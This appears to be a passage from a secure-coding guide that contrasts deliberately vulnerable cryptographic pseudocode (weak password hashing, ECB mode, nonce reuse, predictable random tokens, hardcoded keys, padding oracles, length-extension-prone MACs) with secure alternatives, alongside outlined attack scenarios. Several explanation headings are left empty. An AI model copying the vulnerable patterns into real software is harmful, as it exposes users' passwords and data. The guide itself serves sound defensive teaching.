database.update("users", userId, {"password": hashedPassword})
// VULNERABLE: Single-round SHA256 (still too fast)
function createPasswordHash(password):
return sha256(password)
// VULNERABLE: Unsalted hash
function verifyPassword(inputPassword, storedHash):
return sha256(inputPassword) == storedHash
// VULNERABLE: Simple salt without proper KDF
function hashWithSalt(password, salt):
return sha256(salt + password)
// VULNERABLE: MD5 with salt (still MD5)
function improvedHash(password):
salt = generateRandomBytes(16)
hash = md5(salt + password)
return salt + ":" + hash
Why this is dangerous:
Attack scenario:
// Attacker steals database with MD5 password hashes
// Using hashcat on modern GPU:
hashcat_speed = 180_000_000_000 // 180 billion MD5/second
common_passwords = 1_000_000_000 // 1 billion common passwords
time_to_crack_all = common_passwords / hashcat_speed
// Result: ~0.0056 seconds (about 5.6 ms) to check ALL common passwords against ALL unsalted hashes
// Even SHA256 is fast:
sha256_speed = 23_000_000_000 // 23 billion SHA256/second
// About 0.04 seconds for the same billion-password list
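The arithmetic behind the attack scenario can be checked directly. The sketch below reuses the hash rates quoted above; the 10,000 guesses per second figure for a slow password hash is a hypothetical attacker rate chosen only for comparison.

```python
def seconds_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Time to try every candidate once at the given guess rate."""
    return candidates / guesses_per_second


WORDLIST = 1_000_000_000  # 1 billion common passwords

md5_seconds = seconds_to_exhaust(WORDLIST, 180e9)     # rate quoted above
sha256_seconds = seconds_to_exhaust(WORDLIST, 23e9)   # rate quoted above

# Hypothetical: a memory-hard or high-cost hash limits the attacker
# to about 10,000 guesses per second per target hash.
slow_hash_days = seconds_to_exhaust(WORDLIST, 10_000) / 86_400

print(f"MD5:       {md5_seconds * 1000:.1f} ms")
print(f"SHA-256:   {sha256_seconds * 1000:.1f} ms")
print(f"Slow hash: {slow_hash_days:.2f} days per salted hash")
```

With per-user salts the slow-hash cost applies to each account separately, while unsalted fast hashes are all checked in a single pass.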
// VULNERABLE: ECB mode reveals patterns
function encryptData(plaintext, key):
cipher = createCipher("AES", key, mode = "ECB")
return cipher.encrypt(plaintext)
// VULNERABLE: Default mode may be ECB in some libraries
function simpleEncrypt(data, key):
cipher = AES.new(key) // Some libraries default to ECB!
return cipher.encrypt(padData(data))
// VULNERABLE: Explicit ECB for "simplicity"
function encryptUserData(userData, encryptionKey):
algorithm = "AES/ECB/PKCS5Padding" // Java-style
cipher = Cipher.getInstance(algorithm)
cipher.init(ENCRYPT_MODE, encryptionKey)
return cipher.doFinal(userData)
// VULNERABLE: Assuming any AES is secure
function protectSensitiveData(data, key):
// "AES is strong encryption" - but ECB mode is not
encryptor = AESEncryptor(key, mode = "ECB")
return encryptor.encrypt(data)
Why this is dangerous:
Visual demonstration:
// Original image (bitmap of a penguin):
// ████████████████
// ██ ████ ██
// ██ ██████ ██
// ██████████████
// ████ ████████
// ████████████████
// After ECB encryption:
// ???????????????? ← Still shows penguin shape!
// ?? ???? ?? ← Identical colors → identical ciphertext
// ?? ?????? ??
// ??????????????
// ???? ????????
// ????????????????
// After CBC/GCM encryption:
// ???????????????? ← Random appearance
// ???????????????? ← No pattern visible
// ????????????????
// ????????????????
// ????????????????
// ????????????????
// VULNERABLE: Hardcoded IV
STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
function encryptMessage(plaintext, key):
cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV)
return cipher.encrypt(padData(plaintext))
// VULNERABLE: Same IV for all encryptions
class Encryptor:
IV = generateRandomBytes(16) // Generated ONCE at startup
function encrypt(data, key):
cipher = createCipher("AES-CBC", key, this.IV)
return cipher.encrypt(data)
// VULNERABLE: Counter nonce that restarts from zero
nonce_counter = 0
function encryptWithNonce(plaintext, key):
nonce_counter = nonce_counter + 1
nonce = intToBytes(nonce_counter, 12) // Resets on restart and collides across instances: nonce reuse!
return AES_GCM_encrypt(key, nonce, plaintext)
// VULNERABLE: IV derived from predictable data
function encryptRecord(userId, data, key):
iv = sha256(toString(userId))[:16] // Same IV for same user!
return AES_CBC_encrypt(key, iv, data)
// VULNERABLE: Timestamp-based IV
function timeBasedEncrypt(data, key):
iv = sha256(toString(getCurrentTimestamp()))[:16]
return AES_CBC_encrypt(key, iv, data)
// Problem: Collisions if encrypted in same second
Why this is dangerous:
GCM nonce reuse attack:
// If same nonce used twice with same key in GCM:
// Message 1: plaintext1, ciphertext1, tag1
// Message 2: plaintext2, ciphertext2, tag2
// Attacker can compute:
// - XOR of plaintext1 and plaintext2
// - Eventually recover the authentication key H
// - Forge arbitrary messages with valid tags
// This is a CATASTROPHIC failure of GCM mode
// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason
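The plaintext-XOR leak described above can be reproduced without a crypto library. The sketch below uses a toy counter-mode stream built from SHA-256 as a stand-in for the CTR layer inside GCM; it is not AES-GCM and must not be used for real encryption. All names, keys, and messages are illustrative.

```python
import hashlib


def toy_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy CTR-style keystream: SHA-256(key || nonce || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_ctr_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, toy_keystream(key, nonce, len(plaintext)))


key = b"k" * 32
nonce = b"n" * 12                      # the SAME nonce is used twice
p1 = b"transfer 100 to alice"
p2 = b"transfer 999 to mallo"
c1 = toy_ctr_encrypt(key, nonce, p1)
c2 = toy_ctr_encrypt(key, nonce, p2)

# The keystream cancels out: the attacker learns p1 XOR p2 without the key.
leaked = xor_bytes(c1, c2)
# Knowing (or guessing) one plaintext then reveals the other.
recovered_p2 = xor_bytes(leaked, p1)
print(recovered_p2)
```

In real GCM the same reuse additionally exposes the authentication key, which is what enables forgeries.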
// VULNERABLE: Math.random for token generation
function generateResetToken():
token = ""
for i in range(32):
token = token + toString(floor(random() * 16), base = 16)
return token
// VULNERABLE: Math.random for session ID
function createSessionId():
return "session_" + toString(random() * 1000000000)
// VULNERABLE: Seeded random with predictable seed
function generateApiKey(userId):
setSeed(userId * getCurrentTimestamp())
key = ""
for i in range(32):
key = key + randomChoice(ALPHANUMERIC_CHARS)
return key
// VULNERABLE: Using non-crypto random for encryption IV
function quickEncrypt(data, key):
iv = []
for i in range(16):
iv.append(floor(random() * 256))
return AES_CBC_encrypt(key, iv, data)
// VULNERABLE: JavaScript Math.random() is NOT cryptographic
function generateToken():
return btoa(String.fromCharCode.apply(null,
Array.from({length: 32}, () => Math.floor(Math.random() * 256))
))
Why this is dangerous:
State recovery attack:
// Attacker collects multiple password reset tokens
tokens_observed = [
"a3f7c2e9b1d4...", // Token 1
"8e2a5f1c9b3d...", // Token 2
// ... collect ~30-50 tokens
]
// Using z3 SMT solver or custom reversing:
function recoverMathRandomState(observed_outputs):
// V8's xorshift128+ can be reversed
// Once state recovered, predict next token
state = reverseEngineerState(observed_outputs)
next_token = predictNextOutput(state)
return next_token
// Attacker generates password reset for victim
// Then predicts the token value
// Completes password reset without email access
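Recovering the internal state of a browser engine's generator needs a solver, but the simpler seeded-generator pattern from the vulnerable examples can be broken with a short loop. The sketch below is an illustration under assumptions: the function names, the alphabet, and the five-minute search window are hypothetical.

```python
import random
import secrets

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def weak_api_key(user_id: int, timestamp: int) -> str:
    """Mirrors the vulnerable pattern: non-crypto PRNG with a guessable seed."""
    rng = random.Random(user_id * timestamp)
    return "".join(rng.choice(ALPHABET) for _ in range(32))


def strong_api_key() -> str:
    """OS-backed CSPRNG; there is no seed for an attacker to guess."""
    return secrets.token_urlsafe(32)


def brute_force_seed(target: str, user_id: int, around: int, window: int = 300):
    """Try every timestamp near the suspected issue time."""
    for ts in range(around - window, around + window + 1):
        if weak_api_key(user_id, ts) == target:
            return ts
    return None


issued_at = 1_700_000_000
victim_key = weak_api_key(42, issued_at)

# The attacker knows the user ID and roughly when the key was issued.
recovered_ts = brute_force_seed(victim_key, 42, issued_at + 120)
print(recovered_ts == issued_at)
```

Once the seed is known, every value the generator produced or will produce for that seed is known too.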
// VULNERABLE: Key in source code
ENCRYPTION_KEY = "MySecretKey12345"
function encryptUserData(data):
return AES_encrypt(ENCRYPTION_KEY, data)
// VULNERABLE: Key derived from application constant
function getEncryptionKey():
return sha256(APPLICATION_NAME + ENVIRONMENT + "secret")
// VULNERABLE: Same key for all users
MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef")
function encryptForUser(userId, data):
return AES_encrypt(MASTER_KEY, data)
// VULNERABLE: Key in configuration file (committed to git)
// config.py:
CRYPTO_CONFIG = {
"encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded
"hmac_key": "another_secret_key_here"
}
// VULNERABLE: Weak key (too short)
function quickEncrypt(data):
key = "short" // 5 bytes, not 16/24/32
return AES_encrypt(pad(key, 16), data) // Padded with zeros!
Why this is dangerous:
// VULNERABLE: Direct use of password as key
function deriveKey(password):
return password.encode()[:32] // Truncate or pad to key size
// VULNERABLE: Simple hash as key derivation
function passwordToKey(password):
return sha256(password) // Single round, no salt
// VULNERABLE: MD5-based key derivation
function getKeyFromPassword(password, salt):
return md5(password + salt)
// VULNERABLE: Insufficient iterations
function deriveKeyPBKDF2(password, salt):
return PBKDF2(password, salt, iterations = 1000)
// 2025 recommendation: minimum 600,000 for SHA256
// VULNERABLE: Using key derivation output directly for multiple purposes
function setupCrypto(password, salt):
derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64)
encryptionKey = derived[:32] // First half
hmacKey = derived[32:] // Second half
// Problem: output longer than one hash block doubles the defender's cost but not the attacker's; derive one key, then expand it with HKDF
// VULNERABLE: Weak salt (too short, predictable, or reused)
function deriveKeyWithWeakSalt(password):
salt = "salt" // Static salt defeats purpose
return PBKDF2(password, salt, iterations = 100000)
Why this is dangerous:
Iteration count guidance (2025):
// PBKDF2-SHA256 minimum iterations by use case:
// - Interactive login (100ms budget): 600,000 iterations
// - Background/async (1s budget): 2,000,000 iterations
// - High-security (offline storage): 10,000,000 iterations
// bcrypt cost factor:
// - Minimum 2025: cost = 12 (about 250ms)
// - Recommended: cost = 13-14
// - High-security: cost = 15+
// Argon2id parameters (2025):
// - Memory: 64 MB minimum, 256 MB recommended
// - Iterations: 3 minimum
// - Parallelism: match available cores
// - Argon2id recommended over Argon2i or Argon2d
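Iteration counts are best validated by measuring on the deployment hardware. The following sketch uses `hashlib.pbkdf2_hmac` from the Python standard library with the 600,000-iteration figure quoted above; the function names and the returned tuple layout are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
import time

PBKDF2_ITERATIONS = 600_000  # figure from the guidance above


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS):
    """Return (salt, digest, iterations) so parameters can be raised later."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, iterations, dklen=32
    )
    return salt, digest, iterations


def verify_password(password: str, salt: bytes, expected: bytes,
                    iterations: int) -> bool:
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, iterations, dklen=32
    )
    return hmac.compare_digest(candidate, expected)  # constant-time compare


start = time.perf_counter()
salt, digest, iterations = hash_password("correct horse battery staple")
elapsed_ms = (time.perf_counter() - start) * 1000
print(f"{iterations} iterations took {elapsed_ms:.0f} ms on this machine")
```

Storing the iteration count next to the salt lets old hashes be verified after the default is increased.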
// SECURE: bcrypt with appropriate cost factor
function hashPassword(password):
// Cost factor 12 = ~250ms on modern hardware
// Increase cost factor annually as hardware improves
cost = 12
return bcrypt.hash(password, cost)
function verifyPassword(password, storedHash):
// bcrypt.verify handles timing-safe comparison internally
return bcrypt.verify(password, storedHash)
// SECURE: Argon2id (recommended for new applications)
function hashPasswordArgon2(password):
// Argon2id: hybrid resistant to both side-channel and GPU attacks
options = {
type: ARGON2ID,
memoryCost: 65536, // 64 MB
timeCost: 3, // 3 iterations
parallelism: 4, // 4 parallel threads
hashLength: 32 // 256-bit output
}
return argon2.hash(password, options)
function verifyPasswordArgon2(password, storedHash):
return argon2.verify(storedHash, password)
// SECURE: scrypt for memory-hard hashing
function hashPasswordScrypt(password):
// N = CPU/memory cost (power of 2)
// r = block size
// p = parallelization parameter
salt = generateSecureRandom(16)
hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32)
return encodeSaltAndHash(salt, hash)
// SECURE: Migrating from weak to strong hashing
function upgradePasswordHash(userId, password, currentHash):
// Verify against old hash
if legacyVerify(password, currentHash):
// Re-hash with modern algorithm
newHash = hashPasswordArgon2(password)
database.update("users", userId, {"password_hash": newHash})
return true
return false
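The upgrade-on-login flow above can be sketched with `hashlib.scrypt` from the standard library. This is an illustration under assumptions: the legacy scheme is taken to be unsalted MD5 hex digests, the `scrypt$salt$hash` storage format is hypothetical, and N is set to 2^14 (lower than the 2^17 shown above) only to keep the demo light.

```python
import hashlib
import hmac
import secrets

# Demo parameters; production values should be tuned upward.
SCRYPT_PARAMS = {"n": 2**14, "r": 8, "p": 1, "dklen": 32,
                 "maxmem": 64 * 1024 * 1024}


def scrypt_hash(password: str) -> str:
    salt = secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${digest.hex()}"


def scrypt_verify(password: str, stored: str) -> bool:
    _, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode("utf-8"),
                            salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def legacy_md5(password: str) -> str:
    return hashlib.md5(password.encode("utf-8"), usedforsecurity=False).hexdigest()


def login_and_upgrade(users: dict, user_id: str, password: str) -> bool:
    """Verify a login and transparently replace a legacy hash on success."""
    stored = users[user_id]
    if stored.startswith("scrypt$"):
        return scrypt_verify(password, stored)
    if hmac.compare_digest(legacy_md5(password), stored):
        users[user_id] = scrypt_hash(password)  # re-hash while plaintext is available
        return True
    return False


users = {"u1": legacy_md5("hunter2")}   # in-memory stand-in for the database
first_login = login_and_upgrade(users, "u1", "hunter2")
print(first_login, users["u1"].split("$")[0])
```

Accounts that never log in again keep their legacy hash, so a forced reset or hash wrapping is still needed for dormant users.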
Why this is secure:
// SECURE: AES-256-GCM with proper nonce handling
function encryptAESGCM(plaintext, key):
// Generate cryptographically random 96-bit nonce
nonce = generateSecureRandom(12)
cipher = createCipher("AES-256-GCM", key)
cipher.setNonce(nonce)
// Optional: Add authenticated additional data (AAD)
// AAD is authenticated but NOT encrypted
aad = "context:user_data:v1"
cipher.setAAD(aad)
ciphertext = cipher.encrypt(plaintext)
authTag = cipher.getAuthTag() // 128-bit tag
// Return nonce + tag + ciphertext (all needed for decryption)
return nonce + authTag + ciphertext
function decryptAESGCM(encryptedData, key):
// Extract components
nonce = encryptedData[:12]
authTag = encryptedData[12:28]
ciphertext = encryptedData[28:]
cipher = createCipher("AES-256-GCM", key)
cipher.setNonce(nonce)
cipher.setAAD("context:user_data:v1") // Must match encryption
cipher.setAuthTag(authTag)
try:
plaintext = cipher.decrypt(ciphertext)
return plaintext
catch AuthenticationError:
// Tag verification failed - data tampered or wrong key
log.warn("Decryption authentication failed - possible tampering")
return null
// SECURE: XChaCha20-Poly1305 (extended nonce variant)
function encryptXChaCha(plaintext, key):
// 192-bit nonce - safe for random generation
nonce = generateSecureRandom(24)
ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext)
return nonce + tag + ciphertext
Why this is secure:
// SECURE: Random IV for CBC mode (confidentiality only; add an HMAC or prefer GCM for integrity)
function encryptCBC(plaintext, key):
// 128-bit random IV for AES
iv = generateSecureRandom(16)
cipher = createCipher("AES-256-CBC", key)
ciphertext = cipher.encrypt(plaintext, iv)
// Prepend IV to ciphertext (IV doesn't need to be secret)
return iv + ciphertext
function decryptCBC(encryptedData, key):
iv = encryptedData[:16]
ciphertext = encryptedData[16:]
cipher = createCipher("AES-256-CBC", key)
return cipher.decrypt(ciphertext, iv)
// SECURE: Counter-based nonce with random prefix (for GCM)
class SecureNonceGenerator:
// Random 32-bit prefix + 64-bit counter
// Safe for 2^64 messages with same key
function __init__():
this.prefix = generateSecureRandom(4) // 32-bit random
this.counter = 0
this.lock = Mutex()
function generate():
this.lock.acquire()
try:
if this.counter >= 2^64 - 1:
throw Error("Nonce counter exhausted - rotate key")
this.counter = this.counter + 1
return this.prefix + intToBytes(this.counter, 8)
finally:
this.lock.release() // Always release, even when throwing
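A Python rendering of the counter-based nonce generator, as a minimal sketch: the class name is an assumption, and the `with` block guarantees the lock is released even when the exhaustion error is raised.

```python
import secrets
import threading


class CounterNonceGenerator:
    """96-bit nonces: 32-bit random prefix + 64-bit big-endian counter."""

    MAX_COUNTER = 2**64 - 1

    def __init__(self) -> None:
        self._prefix = secrets.token_bytes(4)  # fresh per process start
        self._counter = 0
        self._lock = threading.Lock()

    def generate(self) -> bytes:
        with self._lock:  # released automatically, including on exceptions
            if self._counter >= self.MAX_COUNTER:
                raise RuntimeError("Nonce counter exhausted - rotate key")
            self._counter += 1
            return self._prefix + self._counter.to_bytes(8, "big")


gen = CounterNonceGenerator()
nonces = [gen.generate() for _ in range(1000)]
print(len(set(nonces)), len(nonces[0]))
```

The random prefix only makes collisions across restarts unlikely; persisting the counter or rotating the key on restart removes that residual risk.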
// SECURE: Synthetic IV (SIV) for nonce-misuse resistance
function encryptSIV(plaintext, key):
// AES-GCM-SIV: Safe even if nonce is accidentally repeated
nonce = generateSecureRandom(12)
ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext)
return nonce + ciphertext
// Note: A repeated nonce only reveals whether the same plaintext was encrypted twice
Why this is secure:
// SECURE: Using OS/platform CSPRNG
// Node.js
function generateSecureRandom(length):
return crypto.randomBytes(length)
// Python
function generateSecureRandom(length):
return secrets.token_bytes(length)
// Java
function generateSecureRandom(length):
random = SecureRandom.getInstanceStrong()
bytes = new byte[length]
random.nextBytes(bytes)
return bytes
// Go
function generateSecureRandom(length):
bytes = make([]byte, length)
_, err = crypto_rand.Read(bytes)
if err != nil:
panic("CSPRNG failure")
return bytes
// SECURE: Token generation for URLs/APIs
function generateUrlSafeToken(length):
// Generate random bytes, encode to URL-safe base64
randomBytes = generateSecureRandom(length)
return base64UrlEncode(randomBytes)
function generateResetToken():
// 256 bits of entropy for password reset token
return generateUrlSafeToken(32)
function generateApiKey():
// Prefix for identification + random component
prefix = "sk_live_"
randomPart = generateUrlSafeToken(24)
return prefix + randomPart
// SECURE: Random number in range
function secureRandomInt(min, max):
range = max - min + 1
bytesNeeded = ceil(log2(range) / 8)
// Rejection sampling to avoid modulo bias
while true:
randomBytes = generateSecureRandom(bytesNeeded)
value = bytesToInt(randomBytes)
if value < (2^(bytesNeeded*8) / range) * range:
return min + (value % range)
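The rejection-sampling idea can be written out in Python as follows. This is a sketch for illustration; the function name is an assumption, and in practice `secrets.randbelow` from the standard library already provides an unbiased result.

```python
import secrets


def secure_random_int(low: int, high: int) -> int:
    """Uniform integer in [low, high] using rejection sampling."""
    if low > high:
        raise ValueError("low must not exceed high")
    span = high - low + 1
    if span == 1:
        return low
    n_bytes = ((span - 1).bit_length() + 7) // 8
    # Largest multiple of span that fits in n_bytes; values at or above it
    # would make some residues more likely than others, so they are rejected.
    limit = (256**n_bytes // span) * span
    while True:
        value = int.from_bytes(secrets.token_bytes(n_bytes), "big")
        if value < limit:
            return low + value % span


rolls = [secure_random_int(1, 6) for _ in range(1000)]
print(min(rolls), max(rolls))
```

The loop terminates quickly because at least half of all candidate values are accepted for any span.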
Why this is secure:
// SECURE: PBKDF2 with sufficient iterations
function deriveKeyPBKDF2(password, salt = null):
// Generate a unique salt for a new derivation; pass the stored salt to re-derive
if salt == null:
salt = generateSecureRandom(16)
// 600,000 iterations minimum for SHA-256 (2025)
iterations = 600000
// Derive key of required length
derivedKey = PBKDF2(
password = password,
salt = salt,
iterations = iterations,
keyLength = 32, // 256 bits
hashFunction = SHA256
)
// Store salt with derived key for later verification
return {salt: salt, key: derivedKey}
// SECURE: HKDF for deriving multiple keys from one secret
function deriveMultipleKeys(masterSecret, salt = null):
// HKDF-Extract: Create pseudorandom key from input
// Pass the stored salt to re-derive the same keys later
if salt == null:
salt = generateSecureRandom(32)
prk = HKDF_Extract(salt, masterSecret)
// HKDF-Expand: Derive purpose-specific keys
encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32)
hmacKey = HKDF_Expand(prk, info = "authentication", length = 32)
searchKey = HKDF_Expand(prk, info = "search-index", length = 32)
return {
encryption: encryptionKey,
hmac: hmacKey,
search: searchKey,
salt: salt // Store for re-derivation
}
// SECURE: Argon2 for password-based key derivation
function deriveKeyFromPassword(password, salt = null):
if salt == null:
salt = generateSecureRandom(16)
derivedKey = argon2id(
password = password,
salt = salt,
memoryCost = 65536, // 64 MB
timeCost = 3,
parallelism = 4,
outputLength = 32
)
return {key: derivedKey, salt: salt}
// SECURE: Key derivation with domain separation
function deriveKeyWithContext(masterKey, context, subkeyId):
// Context prevents cross-purpose key use
info = context + ":" + subkeyId
return HKDF_Expand(masterKey, info, 32)
// Example: Derive per-user encryption keys
function getUserEncryptionKey(masterKey, userId):
return deriveKeyWithContext(masterKey, "user-data-encryption", userId)
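`HKDF_Extract` and `HKDF_Expand` are left abstract in the pseudocode above. A minimal sketch following the RFC 5869 construction with HMAC-SHA256, using only the standard library, could look like this; the master secret, salt, and info labels are placeholders.

```python
import hashlib
import hmac

HASH_LEN = 32  # SHA-256 output size in bytes


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """Condense input keying material into a pseudorandom key (PRK)."""
    if not salt:
        salt = b"\x00" * HASH_LEN
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """Expand the PRK into `length` bytes bound to the `info` label."""
    if length > 255 * HASH_LEN:
        raise ValueError("requested output too long")
    okm = b""
    block = b""
    counter = 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


master_secret = bytes(range(32))            # placeholder, not a real key
prk = hkdf_extract(b"app-salt-v1", master_secret)
encryption_key = hkdf_expand(prk, b"encryption", 32)
hmac_key = hkdf_expand(prk, b"authentication", 32)
user_key = hkdf_expand(prk, b"user-data-encryption:" + b"user-42", 32)
print(encryption_key != hmac_key)
```

Distinct `info` labels give independent keys, so compromising one derived key does not reveal the others or the master secret. HKDF does not slow down guessing, so a password still has to go through PBKDF2, scrypt, or Argon2 first.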
Why this is secure:
// SECURE: Key versioning for rotation
class KeyManager:
function __init__(keyStore):
this.keyStore = keyStore
this.currentKeyVersion = keyStore.getCurrentVersion()
function encrypt(plaintext):
key = this.keyStore.getKey(this.currentKeyVersion)
nonce = generateSecureRandom(12)
ciphertext = AES_GCM_encrypt(key, nonce, plaintext)
// Include key version in output for decryption
return encodeVersionedCiphertext(
version = this.currentKeyVersion,
nonce = nonce,
ciphertext = ciphertext
)
function decrypt(encryptedData):
version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData)
// Fetch correct key version (may be old version)
key = this.keyStore.getKey(version)
if key == null:
throw KeyNotFoundError("Key version " + version + " not available")
return AES_GCM_decrypt(key, nonce, ciphertext)
function rotateKey():
newVersion = this.currentKeyVersion + 1
newKey = generateSecureRandom(32)
this.keyStore.storeKey(newVersion, newKey)
this.currentKeyVersion = newVersion
// Schedule background re-encryption of old data
scheduleReEncryption(newVersion - 1, newVersion)
// SECURE: Re-encryption during key rotation
function reEncryptData(dataId, oldVersion, newVersion, keyManager):
// Fetch encrypted data
encryptedData = database.get("encrypted_data", dataId)
// Verify it uses old key version
currentVersion = extractKeyVersion(encryptedData)
if currentVersion >= newVersion:
return // Already using new or newer key
// Decrypt with old key, re-encrypt with new
plaintext = keyManager.decrypt(encryptedData)
newEncryptedData = keyManager.encrypt(plaintext)
// Atomic update
database.update("encrypted_data", dataId, {
"data": newEncryptedData,
"key_version": newVersion,
"rotated_at": getCurrentTimestamp()
})
// SECURE: Key wrapping for storage
function storeEncryptionKey(keyToStore, masterKey):
// Wrap (encrypt) the key with master key
nonce = generateSecureRandom(12)
wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore)
return {
wrapped_key: wrappedKey,
nonce: nonce,
algorithm: "AES-256-GCM",
created_at: getCurrentTimestamp()
}
function retrieveEncryptionKey(wrappedKeyData, masterKey):
return AES_GCM_decrypt(
masterKey,
wrappedKeyData.nonce,
wrappedKeyData.wrapped_key
)
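The `encodeVersionedCiphertext` and `decodeVersionedCiphertext` helpers used by `KeyManager` are not defined above. One possible byte layout, sketched with Python's `struct` module, is a 4-byte big-endian key version followed by the 12-byte nonce and the ciphertext; this layout is an assumption, not a standard format.

```python
import struct

# Hypothetical header: 4-byte big-endian key version + 12-byte nonce.
HEADER = struct.Struct(">I12s")


def encode_versioned_ciphertext(version: int, nonce: bytes,
                                ciphertext: bytes) -> bytes:
    if len(nonce) != 12:
        raise ValueError("nonce must be 12 bytes")
    return HEADER.pack(version, nonce) + ciphertext


def decode_versioned_ciphertext(blob: bytes):
    if len(blob) < HEADER.size:
        raise ValueError("blob too short")
    version, nonce = HEADER.unpack_from(blob)
    return version, nonce, blob[HEADER.size:]


blob = encode_versioned_ciphertext(3, b"\x01" * 12, b"opaque-ciphertext")
version, nonce, ciphertext = decode_versioned_ciphertext(blob)
print(version, len(nonce), ciphertext)
```

The header is not secret, but passing it as additional authenticated data to the AEAD call would prevent an attacker from swapping the version field.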
Why this is secure:
// VULNERABLE: Revealing padding validity in error messages
function decryptCBC_vulnerable(ciphertext, key, iv):
try:
plaintext = AES_CBC_decrypt(key, iv, ciphertext)
unpadded = removePKCS7Padding(plaintext)
return {success: true, data: unpadded}
catch PaddingError:
return {success: false, error: "Invalid padding"} // ORACLE!
catch DecryptionError:
return {success: false, error: "Decryption failed"}
// Attack: Padding oracle allows full plaintext recovery
// Attacker modifies ciphertext bytes, observes padding errors
// ~128 requests per byte to recover plaintext (on average)
// SECURE: Use authenticated encryption (GCM) or verify an HMAC before decrypting
function decryptCBC_secure(ciphertext, encKey, macKey, iv):
try:
// First verify HMAC before any decryption
providedHmac = ciphertext[-32:]
ciphertextData = ciphertext[:-32]
expectedHmac = HMAC_SHA256(macKey, iv + ciphertextData) // Separate key for the MAC
if not constantTimeEquals(providedHmac, expectedHmac):
return {success: false, error: "Decryption failed"} // Generic error
plaintext = AES_CBC_decrypt(encKey, iv, ciphertextData)
unpadded = removePKCS7Padding(plaintext)
return {success: true, data: unpadded}
catch:
return {success: false, error: "Decryption failed"} // Same error always
// BEST: Just use GCM which prevents this class of attack entirely
Lessons learned:
// VULNERABLE: Using hash(secret + message) for authentication
function createAuthToken(secretKey, message):
return sha256(secretKey + message) // Length extension vulnerable!
function verifyAuthToken(secretKey, message, token):
expected = sha256(secretKey + message)
return token == expected
// Attack: Attacker knows hash(secret + message) and length of secret
// Can compute hash(secret + message + padding + attacker_data)
// Without knowing the secret!
// Example attack:
// Original: hash(secret + "amount=100") = abc123...
// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999")
// Server verifies this as valid!
// SECURE: Use HMAC
function createAuthTokenSecure(secretKey, message):
return HMAC_SHA256(secretKey, message)
function verifyAuthTokenSecure(secretKey, message, token):
expected = HMAC_SHA256(secretKey, message)
return constantTimeEquals(token, expected)
// ALTERNATIVE: hash(message + secret) blocks length extension, but a hash collision on the message forges the tag; prefer HMAC
// ALTERNATIVE: Use SHA-3 or SHA-512/256 (resistant to length extension)
function alternativeAuth(secretKey, message):
return SHA3_256(secretKey + message) // SHA-3 is resistant
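The HMAC-based variant maps directly onto Python's `hmac` module. A minimal sketch, with placeholder key and message values:

```python
import hashlib
import hmac


def create_auth_token(secret_key: bytes, message: bytes) -> str:
    """HMAC-SHA256 tag as hex; not vulnerable to length extension."""
    return hmac.new(secret_key, message, hashlib.sha256).hexdigest()


def verify_auth_token(secret_key: bytes, message: bytes, token: str) -> bool:
    expected = create_auth_token(secret_key, message)
    # Compare as bytes so a non-ASCII token cannot raise TypeError.
    return hmac.compare_digest(expected.encode("utf-8"), token.encode("utf-8"))


key = b"placeholder-key-loaded-from-a-secret-store"
token = create_auth_token(key, b"amount=100")

print(verify_auth_token(key, b"amount=100", token))
print(verify_auth_token(key, b"amount=100&amount=999", token))
```

Appending data to the message invalidates the tag because the attacker cannot recompute the outer keyed hash.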
Lessons learned:
// VULNERABLE: Early-exit string comparison
function verifyToken(providedToken, expectedToken):
if length(providedToken) != length(expectedToken):
return false
for i in range(length(providedToken)):
if providedToken[i] != expectedToken[i]:
return false // Early exit reveals position of first difference
return true
// Attack: Timing differences reveal correct characters
// A correct first char makes the comparison run slightly longer than a wrong one
// Averaging many measurements lets an attacker brute-force character-by-character
// VULNERABLE: Using == operator (language-dependent timing)
function checkHmac(provided, expected):
return provided == expected // May have variable-time implementation
// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
if length(a) != length(b):
// Still constant-time for the comparison
// Length difference may leak - consider padding
return false
result = 0
for i in range(length(a)):
// XOR and OR accumulate differences without early exit
result = result | (a[i] XOR b[i])
return result == 0
// SECURE: Using crypto library comparison
function verifyHmacSecure(message, providedHmac, key):
expectedHmac = HMAC_SHA256(key, message)
return crypto.timingSafeEqual(providedHmac, expectedHmac)
// SECURE: Double-HMAC comparison (timing-safe by design)
function verifyWithDoubleHmac(message, providedMac, key):
expectedMac = HMAC_SHA256(key, message)
